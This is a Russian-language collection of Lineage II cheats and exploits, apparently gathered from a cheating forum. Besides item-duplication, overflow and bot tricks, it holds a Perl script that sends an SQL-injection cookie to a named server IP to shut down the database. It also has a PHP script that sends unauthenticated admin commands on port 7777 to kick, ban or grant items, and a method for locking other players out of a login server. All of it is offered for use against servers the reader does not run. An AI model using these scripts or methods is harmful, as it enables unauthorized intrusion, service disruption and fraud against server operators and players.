Выходим из бота.
Загружаем игру.
Появляемся около антараса.
Оставляем чара долбить его на всю ночь.
Весь прикол в том что антарас не кидается в ответ и не восстанавливает жизни, если к нему прийти без квеста.
Оставляем на ночь.
Утром встаем - собираем дроп (а он имеется в достатке) и читаем scroll of escape.
Фейк заточка
=== Способ 1: ===
Этот метод является достаточно неудобным и не дает 100% шанса на заточку если точить руками... Он известен почти всем, поэтому здесь изложен только вариант где для заточки нужен один человек.
а) Помещаем заточку на панель быстрых клавиш
б) Открываем окно инвентаря
в) Подходим в вархаус киперу и открываем трейд с ним
г) Окно трейда с ВК перетаскиваем на окно Трейда, так что бы одно окно находилось под другим окном
д) Кладем заточку в окно трейда
е) Нажимаем на заточку на хот баре, и подтверждаем трейд с ВК
з) Не выводя курсор за пределы инвентаря, точим вещь лежащую в паке, и узнаем шанс на заточку (то есть либо был бы физл, либозаточка) Поэкспериментировав пару суток можно узнать что при заточке на +4 максимальное количество поломок подряд 6, при +5 максимально 7 физлов. И так далее. Следовательно если вы увидите например при заточке этим методом 6 физлов подряд то вы сразу заточите вещь со 100% шансом.
Вывод: использовать этот метод руками почти не представляется возможным так как на его выполнение уходит очень много времени. Для этого можно писать скрипты на ингейме и все будет ок. Оставляете скрипт на сутки двое и получаете оружие/шмот +20.
=== Способ 2: ===
Требуется иметь в наличии предмет, заточенный до +3 или выше, требуется также иметь свиток энчанта того же класса что и предмет который хотите заточить.
а) Уйдите с другом в место где вам никто не помешает.
б) Поместите свиток энчанта на хоткей.
в) Выложите в продажу этот свиток энчанта за 1 адену, ваш друг должен будет его купить.
г) Начните продажу и затем нажмите на свитке так будто вы хотите провести заточку.
д) Не выносите курсор мыши из инвентаря.
е) Ваш друг должен купить свиток прежде шага
ж) Попробуйте заточить ваш предмет относительно которого вы собираете статистику.
Произойдет то что должно было бы произойти(провал или успех) но на самом деле ваш предмет не заточиться так как свитка энчанта у вас уже нет - ваш приятель его предусмотрительно купил. Проделав это раз 100-200 вы увидите что рандомное распределение придуманное NCSoft не такое уж и рандомное. Будет наблюдаться некоторая закономерность в удачных попытках и провалах - они будут идти целыми полосами совершенно не похожими на рандом. Вы, пронаблюдав эту закономерность, сможете на основании предыдущего опыта сделать вывод об успешности или провале следующего энчанта и соответственно точить предмет или делать фалш заточку указанным методом. Все, что выше, это описание производимых действий. Делаем так:
а) Самое оптимальное : покупаем 2 оружия одинаковых (если финансы позволяют).
б) Точим на +3 оба (ну или 1, далее поймете зачем 2 вепона желательно)
в) Сверху описание тех действий, которые вы поизводите, но замечу! не надо ни в коем случае делать 100-200 енчантов! это ни к чему не приводит! так, как первые 4-10 ложных энчантов идут последовательно, а потом рандом дикий! Производим вышеуказанную операцию по 4 раза на единицу енчанта. Проверяем, какая сейчас последовательность. В основном самое легкое заточить до +10. Итак! Вот как примерно нужно точить, и таблица на каждую единицу до +10:
+1 100%
+2 100%
+3 100%
+4 -+-+-+ (+-+-+-) или же (----++++----+++)
+5 ++---++-++----+++---
+6 +++++----+--++--
+7 +++++++++------
+8 +++-+-+++----+++
+9 ++-++--++---++--
+10 ++--+--++--+
Еще раз повторю! не делайте много энчантов, самое главно это проверить по каким из 3 видов рэндома будет точиться вещь:
а) много плюсов подряд в начале +++++--+----+
б) 2 плюса и минусы ++--++-----++-++---
в) плюс-минус +-+-+-+ 4 ложные заточки должны дать ответ.
Руководсво: После вычесления вида рэндома выбираем момент когда кидать (конечно может быть так, что вы не уверены в последовательности, тогда стоит повторить проверку). Возможные рэндомы:
а) Кидаем понастоящему после 3 или 4 плюсов в ложной заточке, если не уверены - то повторяем ложную заточку)
б) В ложном оверчанте пропускаем все минусы, пока не наткнемся на + , после + в ложном оверчаньте кидаем понастоящему.
в) После минуса в ложном кидаем понастоящему.
ЕЩЕ РАЗ ПОВТОРЮСЬ: ПРОВОДИМ ДЕЙСТВИЯ ПОСЛЕ ТОГО КАК УБЕДИЛИСЬ КАКОЙ ВИД РЭНДОМА ЗАДЕЙСТВОВАН НА ДАННУЮ ЕДИНИЦУ ЕНЧАНТА. ПРОВЕРКУ НУЖНО ДЕЛАТЬ СН
Если на вашем сервере не получается сделать инъекцию через сайт стандартными методами (будь то инъекция через
страницу регистрации или другие "глючные" скрипты) не отчаивайтесь.
Возможно на сайте сервера есть "личный кабинет", в который вы входите используя свой логин и пароль (как например на
la2.raid.ru или lineageii.ru)
Скорее всего сделать инъекцию напрямую через поля login и password сделать не получится, т.к. администраторы наверняка
сделали фильтр "зловредных символов".
Но у таких личных кабинетов есть своё уязвимое место.
Заметим что одинажды зайдя на сайт, он "запоминает" нас делая запись с нашими логином и паролем в кукисы. Само собой
когда мы в следующий раз зайдем на сайт, браузер автоматически пошлет наш логин и пароль из кукисов.
Вот тут администраторы и чаще всего ошибаются, забыв сделать элементарную проверку кукисов, в расчете что
пользователь не сможет их править, а зря!
Ниже приведен скрипт, который посылает наш кукис серверу, в котором содержится инъекция.
PHP код:
язык - perl, думаю срипт можно будет без труда переписать на более близкий к вам по духу язык)
#!/usr/bin/perl -w
use IO::Socket;
use strict;
use CGI;
my $host = '212.33.232.148';
#здесь host - IP сервера на который посылается куки (в нашем случае это рейд)
my $EOL = "\015\012";
my $NL = "%0D%0A";
my $BLANK = $EOL x 2;
my $remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)");
unless ($remote)
{
die "cannot connect to http daemon on $host\n";
}
$remote->autoflush(1);
$remote
"GET /index.php HTTP/1.0".$EOL.
"Cookie: login=\'SHUTDOWN--".
$BLANK;
while (0 and <$remote>)
{
print;
# last if $. == 200;
}
close $remote;
У данной инъекции есть один весомый плюс:
апач не пишет в свои логи кукисы, так что сделав инъекцию через них администраторы далеко не сразу поймут через что их
взломали.
Fake Death
Подходим к воротам замка, делаешь Fake death нажимаешь fixed - ты стоиш на варотах, а дальше жмеш за воротами в любое
место и все, ты за воротами.
Также можно использовать Fake Death не по назначению - бежим, нажимаем Fake Death и очень быстро отменяем его.
В итоге мы может ходить\бегать с включенным скилом.
По нам никто не может стрелять.
Баг отмытие кармы
Регистрируем 4-6 нубов и ведем их в флоран.
Врубаем нужное число копий валкера и ставим, чтоб они после смерти возращались в город и выбегали наружу (это ооочень просто). сами берем самый дешевый лук (чтоб мана не кончалась) и валим их.
Они бегут непрерывной очередью, лук стреляет быстро... получается где-то 600 пк в час. Набиваем 5982 пк или что тоже самое - 2 в 31-й степени кармы.
Карма перескакивает на минус 2 в 31-й степени. Теперь если мы умрем или убьем любого моба, мы станем беленьким.
Но не торопимся ! Мы можем килять всех пока карма отрицательная, а это 2200 пк , т.е. неограниченно.
Теперь берем пяток соклановцев и идем... к примеру в круму. Можем брать любой шмот - из нас НИЧЕГО НЕ ВЫПАДЕТ. МЫ МОЖЕМ УБИВАТЬ КОГО УГОДНО, МЫ КРАСНЫЕ, НО УБИТЬ НАС - ВСЕ РАВНО ЧТО УБИТЬ БЕЛОГО ЧАРА ! Т.е. мы мочим-мочим нубов и приходит хайлевел - защитник... Он нас убивает, и мы падаете уже белым... а он становиться красным ! Эстафета передается ). Думаю он будет в шоке... короче нас реснут и мы меняемся местами...
После этого делим с соклановцами лут , идем в флориан и набиваем теперь уже 2200 пк (т.е. за три- четыре часа)... И снова становимся МЕГА ЧЕЛОМ С ОТРИЦАТЕЛЬНОЙ КАРМОЙ. В следующий раз придется набивать еще меньше , потом мы будем становиться с отрицательной кармой каждые 1000 пк... потом каждые 600..., т.е каждый час мы сможете в присутствии соклановцев делать красным хайлевела в шмоте !!!!!!
А вообще вот вам приблизительный закон возрастания кармы : 122.24(PK) + 56.96(PK)^2 . у кого есть голова и маткад сами могут подсчитать как часто чар будет становиться белым, т.е. набирать 2в 31-й степени, потом 2*(2^31), потом №*(2^31) и так далее.
Да. еще... кто не в курсе ... отмыть реально ... ну 50к кармы. Если 40-го левела отмывать смертями, то он станет 4-м левелом отмыв где-то 80к кармы и больше кармы спадать не будет. Чтобы отмыть 999998 надо завалить где-то 100к мобов своего левела, что нереально.(я пишу именно 8 на конце, т.к. 999999+ кармы значит лишь что ее между 1кк и 2ккк (2 в 31-й степени))
Баг с 7777 портом
PHP код:
$char_name='char_name';
$fp = fsockopen("server-ip", 7777, $errno, $errstr);
if (!$fp) {
echo "$errstr ($errno)
\n";
} else {
$out = "5"."\t".$char_name."\t"."\r\n";
fwrite($fp, $out);
stream_set_timeout($fp, 2);
$answ = fgets($fp,8);
if ($answ==1) {
print"Character is successfully kicked.";
} else {
print"Error.";
}
fclose($fp);
}
?>
Скрипт выше кикакет игрока с ником "char_name" с сервера "server-ip".
Если поиграться с отправляемой строкой, то можно глумиться над сервером как душе угодно.
Вот примеры некоторых строк:
PHP код:
// $out = "5"."\t".$char_name."\t"."\r\n"; // kick
// $out = "5\t{$char_name}\t\r\n"; // kick
// $out = "6\t{$char_name}\t5\t5\t\r\n"; // skill add
// $out = "4\tprobe2\tprobe\t\r\n"; // CHANGE_CHARACTER_NAME
// $out = "39\ttester\t1\t\r\n"; // BAN_CHAR
// $out = "50\tasd\ttester\t1\t1\t\t\t\t\r\n"; // MAN_ANNOUNCE ?
// $out = "45\tprobe\t\t\r\n"; // SEND_HOME ?
// $out = "12\tprobe\t0\t57\t10\t0\t0\t0\t0\t0\t\t\r\n"; // ADD_ITEM
// $out = "12\tprobe\t0\t1148\t1\t0\t0\t0\t0\t0\t\t\r\n"; // ADD_ITEM
// $out = "12\tprobe\t0\t4189\t1\t0\t0\t0\t0\t0\ttester\t\r\n"; // ADD_ITEM
Проблема лишь в том что 7777 порт закрыт практически на всех серверах.
Однако если вдруг вам попадется удача и на вашем сервере это будет работать, то считайте что вам повезло.
Баг с лотереей
Заполняем инвентарь до 78, покупаем лотырейный билет, покупаем в магазине карту(инвентарь заполнен на 80/80), и тогда
билет останется на месте. Приемлемо для серверов с рейтам х1 и для низко-средне уровневых персов для зарабатывания
денег.
Баг с матильдой
Почти всем известный и любимый баг с Алхимиком.
Она находится на северо востоке от Ivory Tоwer, дает квест с 35 уровня.
При получении Wising poition в конце квеста, просто нафлудите в инвентарь хлама типа стрел, кристалов т.д.
Чтобы инвентарь был заполнен на MAX (85). В этом случае когда вам дадут vish poit вы сможете "заканчивать" квест бесконечно.
А так как там неплохой шанс получить 10кк.
Баг с переполнением
Баг на 2^32=4.294.967.296 - ето баг на адену, покупаем такое количество стрел через бота ето выйдет около 100кк адены и загрузка около 1%, потом продаем стрелы пачками по 100кк (не больше)
Баг с продажей
Баг с private story sell.
Человек А ставит в приват стори вещь за 4.967.297а и 500 любых других вещей (стреы ССки кристалы) по 10.000.000.
После этого человек Б покупает вещь и 429 вещей по 10.000.000, и цена в торге станет 1а.
Также, если стоит цена 14.967.297а то просто надо купить 428 вещей по 10.000.000, и так механизм прост х4967297а и 429-х вещей по 10.000.000.
Если поставить цену за предмет 5.000.000а, то цена в торговле будет не 1а, а 32.000 (с копейками)
Бессмертие (демон сет)
Собираем Demon SET (магический сет который дает -240 Х и + М атаку , вроде + 3 INT ).
Создаем Мага 1ого лвл , одеваем этот сет , и ХП уходит в МИНУС , и вы становитесь БЕССМЕРТНЫМ.
Быстрый захват замка
Если на серваке небольшой онлайн, и еще остались незавоеванные замки, то можно его захватить за 10-30 минут.
1.Надо создать клан Даггерщиком.
2.Начинается осада, включаем Silent Move, и идем покорять замок, гуарды не трогают тебя.
Подходишь к Главному Артефакту, и включаешь клан-магию.
Главное не трогать Гуардов, иначе они могут наброситься и сразу убить
Бюп - обход фикса
1. Берем двух чаров (пусть будут тот кого клонируем - 1, а другой 2) ставим их гденибудь в безлюдном месте
2. рес который мы будем дюпить должен быть таким чтоб его могло лежать много в одном слоте
3. в валкере выбираем ентер чар мануал, открывается окно с выбором чаров его оставляем, потом логаутимся, выбираем каким чара 1 и логинимся.
4. сажаем чара 1 в продажу етого ресурса по 1а.
5. в оставшемся окне с ентер чар мануал выбираем 2-ого чара и
жмем ОК, то есть заходим им. 6. заходим и видим как чар 1 сидит в продаже.
7. открываем окно продажи у чара 1 и скидываем ресс вниз (как бы хотя купить) но не нажимаем ок
8. логаутимся и заходим чаром 1 (при этом окно продажи так и висело не закрытым) и нажимаем ОК
(получается что чар покупает рес у самого себя, тобишь у клона. Потом релогинимся и дынц видим как то что вы дюпили кол-во увеличилось в двое)
Обход фикса клона 1
1) садимся на продажу ботом
2) нажимаем в окне MANUAL на Char1 (если он у тебя 1-й по списку и единственыый на твоём акке)
3) сразу жмём ЛОГАУТ до того, как тебя выкинет сам бот
можно дюпать и работает мультипрофа
Обход фикса клона 2
1) заходим клиентом
2) в зале, где выбирать игроков, создаём любого "левого"
3) выбираем 2-го игрока
5) нажимаем удалить
4) нажимаем да
5) идет задержка секунды 2-3, быстро тыкаем START
6) получается, что мы не успели увидеть, как его посадили на удаление
7) когда заходим в игру, то видим следующее -
твой чар стоит, и у тебя есть все кнопки:
START, DELETE, RELOGIN
8) выбираем теперь слева со списка игрока 1 и жмешь START
9) чар подключается опять и клонируется
токо на 2 фиксе дюпать нельзя, а клона мона ставить, то есть мультипрофа пашет
Обход фикса клона 3
1) на акке должно быть 2 чара
2) заходим чаром 1
4) ставим его торговать
3) заходим чаром 2
4) 1 чар остаётся в игре
5) подходим к чару 1 и скидываем вещи которые он продаёт вниз
6) заходим чаром 1
7) нажимаем "ок"
Проверено ла2ру
Обход фикса клона 1+3
1) на акке должно быть 2 чара
2) заходим Мануал (не закрываем окно) или просто делаем рестарт
3) заходим чаром 1
4) ставим его торговать
5) заходим через "Manual" чаром 1 и срузу же жмём "LOGOUT"
6) заходим чаром 2
7) 1 чар остаётся в игре
8) подходим к чару 1 и скидываем вещи, которые он продаёт вниз
9) "Restart" не закрывая окно торговли
10) заходим чаром 1
11) нажимаем "ок"
Фиксов по-моему около 4
1) слежение за мануал логином чара (la2.ru)
2) запрет на мануал, если залогинен в каком-нибудь чаре (l2server.ru)
3) запрет на трейд с самим собой (la2.ru)
4) полный фикс (antaras.ru; la2.chel.ru) - выдаёт сообщение:
"enter char failed"
дополнительный фикс
-чар садится на удаление без задержки
Дополнитеьные скрипты
1) автобан за клона
2) автобан при попытке купить у самого себя
3) запрос на чаров с большим количестовом адены, ресурсов, одинаковые ID уникальных вещей
4) запрос на аккаунты с большим количеством логинов в день
Для обхода совмещённых фиксов 1 и 3 используется 4 обход клона, для второго фикса пока у меня пока нет дюпа, для 4ого фикса пока нет вообще обхода
4 фикс клона - обход?
Вместо закрытия SOCKET'a юзера, в последнем патче сервер отправляет команду `leaveworld`
Закрытие сокета - выкидывание из игры при мануале на того же чара (без фиксов).
Обход 2 и 4 фикса клона
Сервер запрещает пользоваться мануал или кикает при использовании
1) надо попробовать сделать клон через кнопки Create char, Delete char
2) использовать альтернативных ботов
3) сделать логаут из игры, не закрывая окно мануал
Вечный голем
1. Вызываем голема (механического, не осадного).
2. В верху рядом с окном ХП, МП, EXP персонажа появляется окно ХП, МП и полоска времени действия голема (зеленая).
3. Теперь приказываем голему атакавать какую либо цель НПС(если есть) или персонажа (не удерживая кнопку CTRL, тогда
голем просто будет следовать за тем игроком, что вы ему приказали, при условии, что он не ПК).
4. Теперь вы должны убежать от своего голема на большое растояние, чтобы окно с его ХП, МП и полоска времени
действия голема (зеленая) исчезла, после чего бежим сново к своиму голему и видим, что его полоска времени сново
полная.
Гномо - маг
Открываем клиент, заходим на акк, жмём создать акк Выбираем рассу человек - в артмани ищем 0. Меняем рассу на эльфа - отсеиваем 1. и так пока не останется 3 адреса (человек - 0, эльф - 1, афроэльф - 2, орк - 3, гном - 4). Потом ищем 2 адреса класса (маг - 1, воин - 0), пока не останется 1-2 адреса. В первом адресе рассы ставим гнома, в других 2 - любую рассу (или наоборот), в адресах класса ставим 1. Нажимаем создать. Если пишет что-то про ник - значит фикс.
Дюп с лагом
Нужно знать когда сервак ребутнется, и если от первого перса второму скинуть вещицу, вторым выйти и остатся первым, в
последние 30 секунд, то будет дюп.
Дюп сосок
Берете бота 10.6, запускаете его, покупаете 1 соску, бежите в далекое место и выбрасываете эту соску, но при этом, когда
выбрасываете вводите число выбросить столько сколько нужно сосок.
Выбрасывается одна, а запоминается много.
Заходите клиентом этого же перса и поднимаете ни одну соску, а к примеру 10к уже, все зависит от числа, пробуйте, может
больше будет! Соска должна быть 1 в инвентаре.
Дюп страйдеров
Вызываем страйдера, пусть страйдер бьет любого НПЦ.
Когда нажимаем бить НПЦ - он будет бежать, потом возвращаться - просто много раз кликаем и он без перерыва будет бить (контрол нужно зажать)
Сами уходим к ГК. Телепортируемся в другой город. Потом в кнопке действий находим кнопку - сесть на страйдера. Мы сели на страйдера. Потом релогин.
Трубку отдаём другу. Приходим в город, а наш страйдер всё бьёт НПЦ.
Нажимаем на него, и жмём на кнопку return. Он возвращается в рюкзак и появляется трубка.
Дюп через пакеты
1.Пусть ваш друг предложит вам трейд в тот момент когда вы будете использовать сниффер, и поймаете пакет трейда.
2.Когда поймали, предложите трейд вашему другу еще раз.
3.Положите в трейд 1 адену.
4.Теперь посылайте пакет трейда на сервер.
5.После этого закройте окно трейда(У вашего доруга окно трейда будет еще открыто)
6.Положите вещи, которые хотите дюпнуть в ВХ.
7.Предложите трейд вашему другу еще ра, и после того как он подтвердит трейд, вы нажмите Cancel.
Теперь, те вещи которые вы положили в ВХ, будут в вашем инвентаре тоже.
Избавление от веса
Все уже давно знают, что якобы на С3 переменная у торговцев вычисляется по
особому....
НО, под этой переменной, т.к. все фри
сервера сделаны на так скажем на основе С1, скрывается совсем иное значение
для серв. станции...
Следовательно когда мы набирает Вещей на сумму:
4.294.967.296, это два в 31ой или 32ой степени.... то сервер понимает это
не как 4.294.967.296 а как два раза минус
2.147.483.648 т.есть 0аден, Вот и все....
Если говорить еще точнее (все что ниже написано видно прекрасно на боте):
То после 2.147.483.648 сумма уходит в минус ((для сервера) мы то видим что
типа все нормально....), и начинает возростать.... И
теперь уже отрицательную сумму мы должны довести до логического
завершения.... Т.е. довести до +, до нужной суммы она то и будет
для вас покупной....
Т.е. когда а магазине цыфра перевалила за 4.294.967.296, то можете спокойно
отнимать от вашей суммы 4.294.967.296 и вот сколько
получиться за столько вы все и купите Если вес, инвентарь и т.д.
позволяют....
Это так скажем про адену. А теперь что бы достичь одновременно и денег и
анлима... Надо смотреть еще и на вес, с ним происходит
тоже самое...
Вот вам формула. Она вычесляет коффициент.... k = a / v;
где а - это цена вещи, а v - вес.
Для чего она нужна, все знают баг с переполнение денег (описаный выше),
т.е. если денег будет за (2 в 32ой) 4294967296... то
они превратяться в 0 и отсчет будет по новой. Так вот с весом происходит
тоже самое.... тоесть и вес точно так же можно
обмануть....
-> если подобрать такую вещь у которой при каком-то кол-ве будет и веса и
денег переваливать за f*4294967296 (f - тут любое
-> целое натуральное число) и оно будет близко к 0 при новом отсчете.... То
тогда можно на любом шарде будет мутить адену.... ах
-> да то есть надо найти k которое будет целое натуральное число.... потом
делим 4.294.967.296 на вес округляем в сторону большего и закупаем это кол-во. вещи.
Изучение любых скилов
Допустим у вас есть DA 40lvl, вы хотите изучить скилл допустим 60 уровня.
1)качаете на пвп серваке DA до 60+
2)заходите ботом, подходите к мастеру, нажимаете учить скиллы, появляется табличка со списком скиллов
3)делаете логаут, табличка со скиллами при этом остаётся открытой
4)выбираете в боте из списка тот сервер, где у вас DA 40+, подходите к тому же мастеру, что и на пвп серваке, кликаете на него два раза,чтобы появился диалог, и в табличке со скиллами, оставшейся с пвп серва, учите скиллы.
Главное, чтобы хватило СП. Также можно учить скиллы чужих рас.
Квест баг
Проходим простенький квест, наградой за который - опыт и сп.
Дюпаем последний квестовый предмет.
Затем передаём дюпнутые квестовые предметы пэту.
Например для моего квеста нужно 8 клыков паука, значит я передаю эти 8 клыков от пэта своему чару.
Жмем квест - квест у нпц и получаем награду.
Берем квест заново.
Заново перекидываем 8 клыков чару и так до бесконечности!
Автоматизировать можно макросом или скриптом.
Кил логин сервер
1.Берем забаненого перса.
2.Вклю4аем Л2волкер(!)(настравиваем его к серваку, подклю4аем)
3.При подклю4ении бот войдет на сервер и выдаст Вам сообщение, 4то с 4аром у Вас проблемы.
4.В опциях волкер ставим релогин и время равное 1 секунде.
5.Как бот поймает подклю4ение к серверу, он от него не отклю4ится.
6.Другие игроки не смогут подклю4иться к серверу, пока работает волкер
Обход текстур
Подходим к стене/горе/двери, вообщем через что нельзя пройти.
Подойти нужно в упор. Вызываем страйдера и садимся на него.
ТК страйдэр занимает намного больше места чем игрок, часть перса оказывается в текстуре.
Нажимаете вперед или наверх куданить и преодолеваем текстуру.
Если это гора, то вы окажитесь в горе, если дверь, то вы просто пройдете насквозь.
Обход фикса фейка
Есть серверы - например la2world.ru, где способ с дропом заточки пофиксен (заточку нельзя выкинуть из инвентаря).
Тут нужно идти от обратного, то есть выкидывать не заточку, а предмет который точишь.
Я делал следующим образом - дожидался лага сервера или создавал его сам (когда выкидываешь вещь, то она не выбрасывается, а так и остается лежать в инвентаре), выкидываю вещь, подтверждаю, и точу, шансы заточек точно так же будут показываться, но вещь не будет ломаться, до тех пор пока лаг не пройдет и вещь не выкинется из инвентаря, заточки также не будут тратиться.
Овербафф
(1)запускаем l2walker.
(2)пишем логин и пароль.
(3)выбираем каким чаром будем заходить в игру.
(4)Нажимаем кнопку Login.
Атеперь выполняйте эту последовательность:
22:38:01 ??????II????????www.tt2xz.com??????????????????
22:38:01 Link LoginServer Succeed.
22:38:04 Login LoginServer Succeed.
22:38:09 Link GameServer Succeed.
22:38:10 Logout Game.
22:38:10 ??????II????????www.tt2xz.com??????????????????
22:38:11 Link LoginServer Succeed.
22:38:14 Login LoginServer Succeed.
22:38:18 Link GameServer Succeed.
22:38:20 Logout Game.
22:38:21 ??????II????????www.tt2xz.com??????????????????
22:38:21 Link LoginServer Succeed.
22:38:26 Login LoginServer Succeed.
22:38:31 Link GameServer Succeed.
22:38:37 ->Enter Char[2].
22:38:37 Logout Game.
22:38:38 ??????II????????www.tt2xz.com??????????????????
22:38:38 Link LoginServer Succeed.
22:38:44 Login LoginServer Succeed.
22:38:47 Link GameServer Succeed.
22:38:53 ->Enter Char[2].
22:38:54 Logout Game.
после этого нажмите опять Login и после этого зайдите в игру,точнее вы не зайдете в игру так как вас выкинет.
если вас не выкинуло значит овербафф не получился.
22:38:54 ??????II????????www.tt2xz.com??????????????????
22:38:55 Link LoginServer Succeed.
22:39:00 Login LoginServer Succeed.
22:39:04 Link GameServer Succeed.
22:39:10 ->Enter Char[2].
22:39:14 Welcome to the World of Lineage II.
22:39:14 SYSTEM : Welcome to Lineage2World
22:39:14 SYSTEM : -------------------------
22:39:14 SYSTEM : Giran Shops move to Giran Bazaar
22:39:14 SYSTEM : -------------------------
22:39:14 SYSTEM : WTS/WTB use the +Trade window
22:39:14 SYSTEM : -------------------------
22:39:14 SYSTEM : Attacking NPCs results in BAN
22:39:14 SYSTEM : -------------------------
22:39:14 SYSTEM : Read the Rules & FAQs
на этом месте ваш игрок вылетает!
====Ускоренный овербафф====
1.1) Заходим в Лайнэйдж через клиент...
1.2) Делаем себе бафф(ы) который(ые) хотим удваивать (утраивать и т.д.)
1.3) Пытаемся найти место где поменьше глаз...
1.4) Выходим из игры...
2.1) Заходим в L2Walker 10.2.3 (как уж им пользоваться сами сможете найти)
2.2) Пишим Login (ID) и Password (PSW)
2.3) Ждем надписи:
17:39:01 ->Enter Char[Х]. - тут вместо [X] стоит номер вашего персонажа....
2.4) Как дождались надписи быстро жмем Logout.
2.5) В 10.2.3 это будет выглядеть примерно так:
17:38:47 Link LoginServer Succeed.
17:38:52 Login LoginServer Succeed.
17:38:56 Link GameServer Succeed.
17:39:01 ->Enter Char[6].
17:39:01 Logout Game.
3.1) После этого, даже если на вашем сервере стоит задержка все равно нажав вследующий раз Login то вас должно выкинуть при заходе в игру...
4.1) После этого опять в том же L2Walker 10.2.3 нажимаем Login
4.2) Ждем полного захода в игру...
4.3) После того как ваш бот зашел... И появились точки на карте, инфо о вашем чаре... То вверху опять должен загореться Login...
4.4) Поздравляю вас выкинуло.
4.5) Должно получиться примерно следующее:
17:39:02 Link LoginServer Succeed.
17:39:06 Login LoginServer Succeed.
17:39:10 Link GameServer Succeed.
17:39:28 ->Enter Char[6].
17:39:29 Welcome to the World of Lineage II.
17:39:29 SYSTEM : Welcome to Lineage II Extreme 35x!
17:39:29 SYSTEM : You Are being Watched, so be good.
17:39:29 SYSTEM : Vote daily at http://vote.l2extreme.com!
-= вот тут вас выкинет =-
5.1) Строки типа ХХ.ХХ.ХХ System : blablabla.... зависят от вашего сервера, то есть если разные серваки то будут и разные последнии строчки....
6.1) Зайдя в игру вы увидите ровно удвоенное количество баффов на вас....
6.2) Если хотим больше, все просто повторяем процедуру 2.1 - 4.5
7.1) Как умножаются баффы:
{первая цифра означает кол-во баффов на старт}
1 - 2 - 4 - 8 - 16 - 20 (ясень пень 32, но иза того что ограничение всего 20 то и баффов будет именно 20)
2 - 4 - 8 - 16 - 20
3 - 6 - 12 - 20
4 - 8 - 16 - 20
5 - 10 - 20
6 - 12 - 20
7 - 14 - 20
8 - 16 - 20
9 - 18 - 20
10 - 20 (если у вас на старт больше или равно 10 баффам, то сделать процедуру надо всего один раз...)
7.2) Распределение баффов будет выглядеть так (не более чем пример):
ВиндВолк - Акумент - Емпов - Шилд - ВиндВолк - Акумент - Емпов - Шилд - ВиндВолк - Акумент {первая строка}
Емпов - Шилд - ВиндВолк - Акумент - Емпов - Шилд - ВиндВолк - Акумент - Емпов - Шилд {вторая строка}
7.3) при раскладе где преведушее число умноженное на два дает не ровно 20... Там, бафа который стоит первым в очереди будет больше чем всех остальных...
Открытие хелпа
Если не открывается Хелп:
1. Если запускаете игру не через l2.exe , а с помощью загрузчика - избавляйтесь от последнего.
2. файл l2.exe должен быть оригинальный, его можно подобрать из других папок system (почти все сервера свои system выкладывают), но его редко правят.
3. либо меняете nwindow.dll тоже на оригинальный, либо делаете следующее:
Решение для любителей Winhex:
(если конечно гейм гвард не запущен)
открываем процесс l2.exe, ищем модуль nwindow.dll
ищем строку
90908B11FF92B4000000
и меняем на
740C8B11FF92B4000000
Либо ищите и меняйте это внутри nwindow.dll, если он не запакован, конечно.
Пакетное строение
И так пакетное строение -
ff ff ff ff ff-в пятом байте -меняем так чтоб получилось ,перегрузка игры=)
ВПЕ -ставим (прием и отправку -меняем)
под {ff ff ff ff ff и так далее}- вас свои значения - при атаке сами поймайте пакет ==))(17 00 ля ля ?? -вот тут меняем). Чтобы перегруз был следствие - когда вы запустили ВПЕ фильтр - у вас будет ровно 2 сек на удар - Рейдбоссу (желательно стоять рядом) потом экран темнеет и вы сного подгружаетесь - замечаете: повреждение вы нанесли, а босс ни атакует (таким образом сбрасывается атака нпс'ов на вас).
Покупка по цене продажи
Можно покупать соски, бутылки по цене, за которую их продаёшь (50% помойму).
-подходишь к продавцу, кладешь 5 бутылок (к примеру).
-в артмани ищешь значение, убираешь 1 бутылку, отсеиваешь, пока не получаем 3 значения, или около того.
-теперь меняем значения на "-10" (к примеру), сразу в артмани появляеться какая-то ахинея вместо "-10".
-переключаемся в клиент, и видим что на лотке лежит "-10" бутылок.
-смело жмём ок, и получаем 10 бутылок, по цене которой у нас их барыга-продавец хотел купить.
Покупка через пакеты
Подходим к трейдеру-нажимаем,чтобы появился диалог, посылаем пакет C0x1f с нужным ID шмотки, и покупаем её, даже если она не может продаваться в магазе. В некоторых случаях покупается за 0 адены.
Превышение веса
Нагрузить дракона под завязку, и себя под завязки и дракона вернуть. Вес будет больше 100% - можно будет нагрузиться хоть на 20К%
Скорость атаки ( - )
1.Выбираем сервер с высокими рейтами (желательно , но не обязательно )
2. Нам понадобяться 2 чара желательно оба равного лвл, 1ый чар - ЛУЧНИК (ОБЯЗАТЕЛЬНО) 2ой ШИЛИН ЭЛДЕР или ШИЛИНГ КНАЙТ (желательно 1ое , хотя на некоторых сераках и то и то одинаково работает)
3. Лучником наскорую качаемся до лвл конкурентов (ну до 80 к примеру) на ПВП сервака это быстро ... Внимание НЕ КАЧАЕМ СКИЛ ХАСТЕ (при читерстве надо быть без бафа вообще , без вссяких сетов которые прибавляют Скорость атаки), если есть возможность купить краски для тату то покупаем -5 DEX (желательно , весьма нужная штуковина) Покупаем VERY SLOW лук , SOUL BOW пойдет 100 проц , Желательно если вы 52 лвл напяливаем что нить что дает штраф.
4. Запускаем бота ШИЛКУ ЕЛДЕЛА , флагаемся (бот должен приблизительно быть одинакового лвл) сразу кидаем ВИНД ШАКАЛА (который снижает скорость атаки) либо Шилкой кнайтом КУБИКОМ понижаем себе же скорость атаки , ДЕБАФ спадает через 2-5 минут , но эффект скорее всего останеться на 90 проц (на крутых шардах фикс стоит на 2-5 минут , но этого вполне хватает что бы завалить антараса или ешё кого нить)
5. Ваша скорость Атаки заходит в МИНУС , а это значит что скорость атаки у вас 99999.
Вообще смысл бага сделать все возможное что бы скорость атаки была как можно меньше , и когда накладывался ДЕБАФ она вообще уходила в минус.
Скорость атаки Тиранта
Вообщем у туранта есть такой скилл, как Fist Fury, заключаеться он в том, что когда его включаешь вместе с кастетами, он непрерывно сосет ману, но при этом довольно существенно возрастает скорость атаки.
Как это можно использовать: одеваешь туранту костеты, включаешь этот скилл, а потом переключаешься на даггер, не отключая скилла.
В итоге получаем огромную скорость атаки даггером.
Создание клона
Создание клона в Lineage 2
0)Делается все только ботом:
1)Напишите логин, пароль
2)Выберите чар "мануал", нажмите логин
3)Выскочит окно с вашими созданными персами
4)Ничего не выбирайте, и не закрывайте это окно
5)Нажмите "ЛОГАУТ"
6)Выберите в раскрывающемся меню выбора чара номер чара и нажмите логин, зайдя в игру
7)Выберите перса в окошке (которое вы не закрывали), и которым вы только что зашли в игру
